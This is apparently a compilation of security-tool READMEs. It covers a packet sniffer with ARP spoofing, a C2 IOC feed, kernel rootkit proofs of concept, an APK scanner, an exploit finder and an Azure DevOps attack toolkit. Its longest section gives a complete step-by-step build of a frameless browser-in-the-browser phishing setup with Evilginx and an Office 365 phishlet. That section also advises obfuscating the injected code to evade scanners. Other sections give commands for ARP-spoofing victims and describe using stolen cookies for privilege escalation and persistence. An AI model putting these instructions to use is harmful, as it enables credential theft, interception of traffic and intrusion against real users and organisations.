        • 10.0.0.200 phising.lab
        • 10.0.0.201 server.lab
        • 10.0.0.201 mail.server.lab
        • 10.0.0.202 gophish.lab
        • 10.0.0.110 infectionmonkey.lab
        • 10.0.0.111 mongodb.lab
        • 10.0.0.112 purpleops.lab
        • 10.0.0.113 caldera.lab

        Defense

        • 10.0.1.101 defense.lab
        • 10.0.1.10 dvwa.lab
        • 10.0.1.13 wackopicko.lab
        • 10.0.1.14 juiceshop.lab
        • 10.0.1.20 gitea.lab
        • 10.0.1.110 infectionmonkey.lab
        • 10.0.1.112 purpleops.lab
        • 10.0.1.113 caldera.lab

        Monitor

        • 10.0.3.201 server.lab
        • 10.0.3.201 mail.server.lab
        • 10.0.3.9 mariadb.lab
        • 10.0.3.10 dvwa.lab
        • 10.0.3.11 dvwa-monitor.lab
        • 10.0.3.12 dvwa-modsecurity.lab
        • 10.0.3.102 monitor.lab
        • 10.0.3.30 wazuh-manager.lab
        • 10.0.3.31 wazuh-indexer.lab
        • 10.0.3.32 wazuh-dashboard.lab
        • 10.0.3.40 splunk.lab

        Public

        • 10.0.2.101 defense.lab
        • 10.0.2.13 wackopicko.lab

        Internet

        • 10.0.4.102 monitor.lab
        • 10.0.4.30 wazuh-manager.lab
        • 10.0.4.32 wazuh-dashboard.lab
        • 10.0.4.40 splunk.lab

        Internal

        • 10.0.5.100 attack.lab
        • 10.0.5.12 dvwa-modsecurity.lab
        • 10.0.5.13 wackopicko.lab

        License

        This Docker Compose application is released under the MIT License. See the LICENSE file for details.



        Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

        By: Zion3R

Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so that all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionage was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper; scapylib only assists with HTTP requests and ARP.


        Installation

        1: git clone https://www.github.com/josh0xA/Espionage.git
        2: cd Espionage
        3: sudo python3 -m pip install -r requirments.txt
        4: sudo python3 espionage.py --help

        Usage

        1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
          Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
        2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
          Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
        3. sudo python3 espionage.py --normal --iface wlan0
  Command 3 will still execute a clean packet sniff; however, it will not save the data to a pcap file. Saving the sniff is recommended.
        4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
          Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
        5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
  Command 5 will ARP spoof the target IP address, and all data being sent will be routed back to the attacker's machine (you/localhost).
        6. sudo python3 espionage.py --iface wlan0 --onlyhttp
          Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
        7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
          Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
        8. sudo python3 espionage.py --iface wlan0 --urlonly
  Command 8 will only sniff and return URLs visited by the victim (works best with sslstrip).

        9. Press Ctrl+C in-order to stop the packet interception and write the output to file.
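The first step any sniffer performs on captured traffic is decoding the IPv4 header to recover direction and protocol, as shown in the verbose output described above. A minimal sketch of that decoding step (illustrative, not Espionage's actual parser):

```python
import struct

def parse_ipv4_header(packet: bytes):
    """Decode the fixed 20-byte IPv4 header from raw packet bytes."""
    (version_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    return {
        "version": version_ihl >> 4,
        "ihl": version_ihl & 0x0F,      # header length in 32-bit words
        "ttl": ttl,
        "protocol": proto,              # 6 = TCP, 17 = UDP, 1 = ICMP
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
    }
```
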

        Menu

        usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
        [-t TARGET]

        optional arguments:
        -h, --help show this help message and exit
        --version returns the packet sniffers version.
        -n, --normal executes a cleaner interception, less sophisticated.
        -v, --verbose (recommended) executes a more in-depth packet interception/sniff.
        -url, --urlonly only sniffs visited urls using http/https.
        -o, --onlyhttp sniffs only tcp/http data, returns urls visited.
        -ohs, --onlyhttpsecure
        sniffs only https data, (port 443).
        -hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

        (Recommended) arguments for data output (.pcap):
        -f FILENAME, --filename FILENAME
        name of file to store the output (make extension '.pcap').

        (Required) arguments required for execution:
        -i IFACE, --iface IFACE
        specify network interface (ie. wlan0, eth0, wlan1, etc.)

        (ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
        -t TARGET, --target TARGET


        Writeup

        A simple medium writeup can be found here:
        Click Here For The Official Medium Article

        Ethical Notice

The developer of this program, Josh Schiavone, has written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicious intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

        License

        MIT License
        Copyright (c) 2024 Josh Schiavone




        C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

        By: Zion3R


Free-to-use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. Work is ongoing to make the backend more reliable.


        Honorable Mentions

        Many of the Shodan queries have been sourced from other CTI researchers:

        Huge shoutout to them!

        Thanks to BertJanCyber for creating the KQL query for ingesting this feed

        And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

        What do I track?

        Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY:

        echo 'export SHODAN_API_KEY=API_KEY' >> ~/.bashrc
        source ~/.bashrc
        python3 -m pip install -r requirements.txt
        python3 tracker.py
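The collection step described above (Shodan searches deduplicated into per-tool lists plus an all.txt) could be sketched like this. Shodan match dicts do carry an `ip_str` field; everything else here is illustrative of the data layout, not C2-Tracker's actual code.

```python
def collect_ips(matches):
    """Deduplicate and sort IPs from Shodan match dicts (each match
    from the shodan library carries an 'ip_str' field)."""
    return sorted({m["ip_str"] for m in matches})

def build_feed(per_tool: dict):
    """Build per-tool IP lists plus a combined all.txt, mirroring the
    data/ layout described above. Sketch only; file naming is assumed."""
    files = {f"{tool}.txt": collect_ips(matches)
             for tool, matches in per_tool.items()}
    files["all.txt"] = sorted({ip for ips in files.values() for ip in ips})
    return files
```
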

        Contributing

        I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

        References



        VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

        By: Zion3R


PoCs for kernelmode rootkit techniques, for research or education. Currently focused on Windows. All modules support 64-bit OSes only.

        NOTE

        Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.

        Β 

        Environment

All modules are tested on Windows 11 x64. To test the drivers, the following options can be used on the testing machine:

        1. Enable Loading of Test Signed Drivers

2. Setting Up Kernel-Mode Debugging

Each option requires disabling Secure Boot.

        Modules

Detailed information is given in the README.md in each project's directory. All modules are tested on Windows 11.

        Module Name Description
        BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
        BlockNewProc PoCs to block new process with Process Notify Callback method.
        CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
        DropProcAccess PoCs to drop process handle access with Object Notify Callback.
        GetFullPrivs PoCs to get full privileges with DKOM method.
        GetProcHandle PoCs to get full access process handle from kernelmode.
        InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
        ModHide PoCs to hide loaded kernel drivers with DKOM method.
        ProcHide PoCs to hide process with DKOM method.
        ProcProtect PoCs to manipulate Protected Process.
        QueryModule PoCs to perform retrieving kernel driver loaded address information.
        StealToken PoCs to perform token stealing from kernelmode.

        TODO

More PoCs, especially covering the following areas, will be added later:

        • Notify callback
        • Filesystem mini-filter
        • Network mini-filter

        Recommended References



        Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

        By: Zion3R


        A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

        This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


        Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

        β˜•οΈŽ Buy Me A Coffee

        Video Tutorial: πŸ‘‡

        Disclaimer

        This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

        Backstory - The Why

        Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

        That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

        The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

        In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

        The What

        A Browser In The Browser (BITB) without any iframes! As simple as that.

        Meaning that we can now use BITB with Evilginx on websites like Microsoft.

        Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

        The How

        Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
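The search-and-replace idea above can be made concrete with a small sketch: append the landing-page content next to the proxied page's markup, hosted in a shadow root so it cannot clash with the proxied page's own scripts and styles. Element IDs and the injection point are illustrative, not the repo's actual substitutions.

```python
def inject_bitb(proxied_html: str, landing_html: str) -> str:
    """Sketch of injecting BITB landing content via substitution,
    with no iframe involved (illustrative, hypothetical IDs)."""
    injection = (
        '<div id="bitb-host"></div>'
        "<script>"
        "const host = document.getElementById('bitb-host');"
        # A closed shadow root isolates the landing page's DOM from
        # the proxied page, so framebusters have no iframe to target.
        "const root = host.attachShadow({mode: 'closed'});"
        f"root.innerHTML = {landing_html!r};"
        "</script>"
    )
    # Substitute just before </body>, leaving the original proxied
    # structure and content intact.
    return proxied_html.replace("</body>", injection + "</body>")
```
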

        Instructions

        Video Tutorial


        Local VM:

        Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

        Update and Upgrade system packages:

        sudo apt update && sudo apt upgrade -y

        Evilginx Setup:

        Optional:

        Create a new evilginx user, and add user to sudo group:

        sudo su

        adduser evilginx

        usermod -aG sudo evilginx

        Test that evilginx user is in sudo group:

        su - evilginx

        sudo ls -la /root

        Navigate to users home dir:

        cd /home/evilginx

        (You can do everything as sudo user as well since we're running everything locally)

        Setting Up Evilginx

        Download and build Evilginx: Official Docs

        Copy Evilginx files to /home/evilginx

        Install Go: Official Docs

        wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
        sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
        nano ~/.profile

        ADD: export PATH=$PATH:/usr/local/go/bin

        source ~/.profile

        Check:

        go version

        Install make:

        sudo apt install make

        Build Evilginx:

        cd /home/evilginx/evilginx2
        make

        Create a new directory for our evilginx build along with phishlets and redirectors:

        mkdir /home/evilginx/evilginx

        Copy build, phishlets, and redirectors:

        cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

        cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

        cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

        Ubuntu firewall quick fix (thanks to @kgretzky)

        sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get a Failed to start nameserver on: :53 error, try modifying this file:

        sudo nano /etc/systemd/resolved.conf

        edit (or add) the DNSStubListener line so it reads DNSStubListener=no

        then

        sudo systemctl restart systemd-resolved

        Modify Evilginx Configurations:

        Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

        nano ~/.evilginx/config.json

        CHANGE https_port from 443 to 8443
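        If you prefer to script the change, a sed one-liner illustrates the edit. The stub below is a simplified stand-in for ~/.evilginx/config.json (the real file has more fields); only the https_port key is taken from the step above:

        ```shell
        # Simplified stand-in for ~/.evilginx/config.json (illustrative only)
        cat > /tmp/config.json <<'EOF'
        {
          "general": {
            "https_port": 443
          }
        }
        EOF
        # Flip https_port from 443 to 8443 so Apache can own port 443
        sed -i 's/"https_port": 443/"https_port": 8443/' /tmp/config.json
        grep '"https_port"' /tmp/config.json
        ```

        Run the same substitution against the real config path once you have confirmed it on a copy.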

        Install Apache2 and Enable Mods:

        Install Apache2:

        sudo apt install apache2 -y

        Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

        sudo a2enmod proxy
        sudo a2enmod proxy_http
        sudo a2enmod proxy_balancer
        sudo a2enmod lbmethod_byrequests
        sudo a2enmod env
        sudo a2enmod include
        sudo a2enmod setenvif
        sudo a2enmod ssl
        sudo a2ensite default-ssl
        sudo a2enmod cache
        sudo a2enmod substitute
        sudo a2enmod headers
        sudo a2enmod rewrite
        sudo a2dismod access_compat

        Start and enable Apache:

        sudo systemctl start apache2
        sudo systemctl enable apache2

        Check that Apache and VM networking work by visiting the VM's IP from a browser on the host machine.

        Clone this Repo:

        Install git if not already available:

        sudo apt -y install git

        Clone this repo:

        git clone https://github.com/waelmas/frameless-bitb
        cd frameless-bitb

        Apache Custom Pages:

        Make directories for the pages we will be serving:

        • home: (Optional) Homepage (at base domain)
        • primary: Landing page (background)
        • secondary: BITB Window (foreground)
        sudo mkdir /var/www/home
        sudo mkdir /var/www/primary
        sudo mkdir /var/www/secondary

        Copy the directories for each page:


        sudo cp -r ./pages/home/ /var/www/

        sudo cp -r ./pages/primary/ /var/www/

        sudo cp -r ./pages/secondary/ /var/www/

        Optional: Remove the default Apache page (not used):

        sudo rm -r /var/www/html/

        Copy the O365 phishlet to phishlets directory:

        sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

        Optional: To make the Calendly widget use your account instead of the included default, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

        Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

        Self-signed SSL certificates:

        Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

        We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

        Create dir and parents if they do not exist:

        sudo mkdir -p /etc/ssl/localcerts/fake.com/

        Generate the SSL certs using the OpenSSL config file:

        sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
        -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
        -config openssl-local.cnf

        Modify private key permissions:

        sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
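        As a quick sanity check, the same generate-and-inspect pattern can be exercised against throwaway files in /tmp (the CN and paths here are illustrative, not the real /etc/ssl/localcerts layout):

        ```shell
        # Generate a throwaway self-signed cert without an OpenSSL config file
        openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
          -keyout /tmp/privkey.pem -out /tmp/fullchain.pem \
          -subj "/CN=fake.com" 2>/dev/null
        chmod 600 /tmp/privkey.pem
        # Confirm the subject and validity window of what was generated
        openssl x509 -in /tmp/fullchain.pem -noout -subject -enddate
        ```

        The same `openssl x509 -noout -subject` inspection works against the real fullchain.pem to confirm the cert was generated with the expected domain.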

        Apache Custom Configs:

        Copy custom substitution files (the core of our approach):

        sudo cp -r ./custom-subs /etc/apache2/custom-subs
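        For context, the rules inside these substitution files use Apache's stock mod_substitute syntax. A minimal illustrative rule (not taken from the repo, shown only to convey the mechanism) looks like:

        ```apache
        <Location "/">
            # Apply substitutions to proxied HTML responses
            AddOutputFilterByType SUBSTITUTE text/html
            # Inject a stylesheet reference before </head> (illustrative pattern only)
            Substitute "s|</head>|<link rel=\"stylesheet\" href=\"/bitb.css\"></head>|i"
        </Location>
        ```

        The real files in custom-subs/ carry many such rules to inject the BITB HTML/CSS/JS into the proxied pages.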

        Important Note: This repo includes 2 substitution configs, for Chrome on Mac and Chrome on Windows BITB. Both auto-detect and style for light/dark mode, and they should serve as base templates for achieving the same with other browser/OS combos. Since automatic detection of the visitor's browser/OS combo is not included, you will have to use one of the two or implement your own logic for automatic switching.

        Both config files under /apache-configs/ are identical except for the Include directive that selects which substitution file is used (there are 2 such references in each file).

        # Uncomment the one you want and remember to restart Apache after any changes:
        #Include /etc/apache2/custom-subs/win-chrome.conf
        Include /etc/apache2/custom-subs/mac-chrome.conf

        To make this next step easier, both versions are included as separate files.

        Windows/Chrome BITB:

        sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

        Mac/Chrome BITB:

        sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

        Test Apache configs to ensure there are no errors:

        sudo apache2ctl configtest

        Restart Apache to apply changes:

        sudo systemctl restart apache2

        Modifying Hosts:

        Get the IP of the VM using ifconfig and note it somewhere for the next step.

        We now need to add entries to our hosts file to point the demo domain fake.com and all of its subdomains to the VM on which Apache and Evilginx are running.

        On Windows:

        Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

        Click File > Open (top-left), and in the File Explorer address bar, paste the following:

        C:\Windows\System32\drivers\etc\

        Change the file type filter (bottom-right) to "All Files".

        Double-click the file named hosts

        On Mac:

        Open a terminal and run the following:

        sudo nano /private/etc/hosts

        Now modify the following records (replace [IP] with the IP of your VM), then paste them at the end of the hosts file:

        # Local Apache and Evilginx Setup
        [IP] login.fake.com
        [IP] account.fake.com
        [IP] sso.fake.com
        [IP] www.fake.com
        [IP] portal.fake.com
        [IP] fake.com
        # End of section

        Save and exit.
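        For reference, the same records can be generated with a small shell loop (VM_IP below is a hypothetical placeholder; substitute your VM's actual address):

        ```shell
        VM_IP="192.168.1.50"  # hypothetical placeholder; use your VM's real IP
        # Build the hosts-file lines for the demo domain and all its subdomains
        HOSTS_ENTRIES=$(for name in login.fake.com account.fake.com sso.fake.com www.fake.com portal.fake.com fake.com; do
          printf '%s %s\n' "$VM_IP" "$name"
        done)
        printf '%s\n' "$HOSTS_ENTRIES"
        ```

        On Mac you could append the output directly with sudo tee -a; on Windows, paste it into the hosts file as described above.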

        Now restart your browser before moving to the next step.

        Note: On Mac, use the following command to flush the DNS cache:

        sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

        Important Note:

        This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlets get-hosts [PHISHLET_NAME], but remember to replace the 127.0.0.1 with the actual local IP of your VM.
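        That replacement can be done in bulk with sed; the file name, sample line, and IP below are hypothetical stand-ins for saved get-hosts output:

        ```shell
        # Hypothetical saved output of the get-hosts command (one illustrative line)
        echo "127.0.0.1 login.fake.com" > /tmp/phishlet_hosts.txt
        # Swap loopback for the VM's LAN IP (192.168.1.50 is a placeholder)
        sed -i 's/127\.0\.0\.1/192.168.1.50/g' /tmp/phishlet_hosts.txt
        cat /tmp/phishlet_hosts.txt
        ```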

        Trusting the Self-Signed SSL Certs:

        Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com, so we need to make our host machine trust the certificate authority that signed the SSL certs.

        For this step, it's easier to follow the video instructions, but here is the gist anyway.

        Open https://fake.com/ in your Chrome browser.

        Ignore the Unsafe Site warning and proceed to the page.

        Click the SSL icon > Details > Export Certificate. IMPORTANT: when saving, the name MUST end with .crt for Windows to open it correctly.

        Double-click it > Install for current user. Do NOT select automatic; instead, place the certificate in a specific store and select "Trusted Root Certification Authorities".

        On Mac: to install for the current user only, select "Keychain: login" AND click "View Certificates" > Details > Trust > Always Trust.

        Now RESTART your Browser

        You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

        Running Evilginx:

        At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

        Optional: Install tmux (keeps Evilginx running even if the terminal session is closed; mainly useful when running on a remote VM):

        sudo apt install tmux -y

        Start Evilginx in developer mode (using tmux to avoid losing the session):

        tmux new-session -s evilginx
        cd ~/evilginx/
        ./evilginx -developer

        (To re-attach to the tmux session use tmux attach-session -t evilginx)

        Evilginx Config:

        config domain fake.com
        config ipv4 127.0.0.1

        IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

        blacklist noadd

        Setup Phishlet and Lure:

        phishlets hostname O365 fake.com
        phishlets enable O365
        lures create O365
        lures get-url 0

        Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

        Useful Resources

        Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

        Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

        My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

        How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

        Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

        TODO

        • Create script(s) to automate most of the steps


        Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

        By: Zion3R


        This tool compilation is carefully crafted to be useful both to beginners and to veterans of the malware analysis world. It has also proven useful for people trying their luck in the cracking underworld.

        It's the ideal complement to the manuals from the site, and for playing with the numbered theories mirror.


        Advantages

        To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

        1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

        2. The pack is integrated with a Universal Updater that we made from scratch. Thanks to that, we can maintain all the tools in an automated fashion.

        3. It's really easy to expand and modify: just update the file bin\updater\tools.ini to add the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto so they appear in the context menus.

        4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

        Installation

        1. You can simply download the stable versions from the release section, where you can also find the installer.

        2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
          You will find the binary in the folder bin\updater\updater.exe.

        Tool set

        This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
        Every tool has been downloaded from its original/official website, but we still recommend using them with caution, especially those tools whose official pages are forum threads. Always exercise common sense.
        You can check the complete list of tools here.

        About contributions

        Pull Requests are welcome. If you want to propose big changes, you should first create an Issue about it, so we can all analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



        APKDeepLens - Android Security Insights In Full Spectrum

        By: Zion3R


        APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


        Features

        APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

        • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
        • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
        • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
        • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
        • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
        • Intent Filter Exploits -> Pinpoints vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
        • Local File Vulnerability Detection -> Safeguards your app by identifying potential mishandling of local file operations.
        • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
        • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
        • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

        Installation

        To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

        For Linux

        git clone https://github.com/d78ui98/APKDeepLens
        cd APKDeepLens
        python3 -m venv venv
        source venv/bin/activate
        pip install -r requirements.txt
        python APKDeepLens.py --help

        For Windows

        git clone https://github.com/d78ui98/APKDeepLens
        cd APKDeepLens
        python -m venv venv
        .\venv\Scripts\activate
        pip install -r .\requirements.txt
        python APKDeepLens.py --help

        Usage

        To scan an APK, use the command below, specifying the APK file with the -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

        python3 APKDeepLens.py -apk file.apk

        If you've already extracted the source code and want to provide its path for a faster scan, use the command below, specifying the source code of the Android application with the -source parameter.

        python3 APKDeepLens.py -apk file.apk -source <source-code-path>

        To generate detailed PDF and HTML reports after the scan, pass the -report argument as shown below.

        python3 APKDeepLens.py -apk file.apk -report

        Contributing

        We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

        For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

        Featured at



        Sicat - The Useful Exploit Finder

        By: Zion3R

        Introduction

        SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

        SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploits. This tool helps cybersecurity professionals and researchers understand potential security risks, providing valuable insights to enhance system security.


        SiCat Resources

        Installation

        git clone https://github.com/justakazh/sicat.git && cd sicat

        pip install -r requirements.txt

        Usage


        ~$ python sicat.py --help

        Command Line Options:

        Command Description
        -h Show help message and exit
        -k KEYWORD Keyword to search for
        -kv KEYWORD_VERSION Version of the keyword
        -nm Identify via nmap output
        --nvd Use NVD as info source
        --packetstorm Use PacketStorm as info source
        --exploitdb Use ExploitDB as info source
        --exploitalert Use ExploitAlert as info source
        --msfmodule Use Metasploit as info source
        -o OUTPUT Path to save output to
        -ot OUTPUT_TYPE Output file type: json or html

        Examples

        From keyword


        python sicat.py -k telerik --exploitdb --msfmodule

        From nmap output


        nmap --open -sV localhost -oX nmap_out.xml
        python sicat.py -nm nmap_out.xml --packetstorm

        To-do

        • [ ] Input from nmap result from pipeline
        • [ ] Nmap multiple host support
        • [ ] Search NSE Script
        • [ ] Search by PORT

        Contribution

        I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcome and valued.



        ADOKit - Azure DevOps Services Attack Toolkit

        By: Zion3R


        Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

        Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


        Installation/Building

        Libraries Used

        The below 3rd party libraries are used in this project.

        Library URL License
        Fody https://github.com/Fody/Fody MIT License
        Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License

        Pre-Compiled

        • Use the pre-compiled binary in Releases

        Building Yourself

        Take the below steps to set up Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

        • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
        • Go to "NuGet Package Manager" --> "Package Sources"
        • Add a package source with the URL https://api.nuget.org/v3/index.json
        • Install the Costura.Fody NuGet package.
        • Install-Package Costura.Fody -Version 3.3.3
        • Install the Newtonsoft.Json package
        • Install-Package Newtonsoft.Json
        • You can now build the project yourself!

        Command Modules

        • Recon
        • check - Check whether organization uses Azure DevOps and if credentials are valid
        • whoami - List the current user and its group memberships
        • listrepo - List all repositories
        • searchrepo - Search for given repository
        • listproject - List all projects
        • searchproject - Search for given project
        • searchcode - Search for code containing a search term
        • searchfile - Search for file based on a search term
        • listuser - List users
        • searchuser - Search for a given user
        • listgroup - List groups
        • searchgroup - Search for a given group
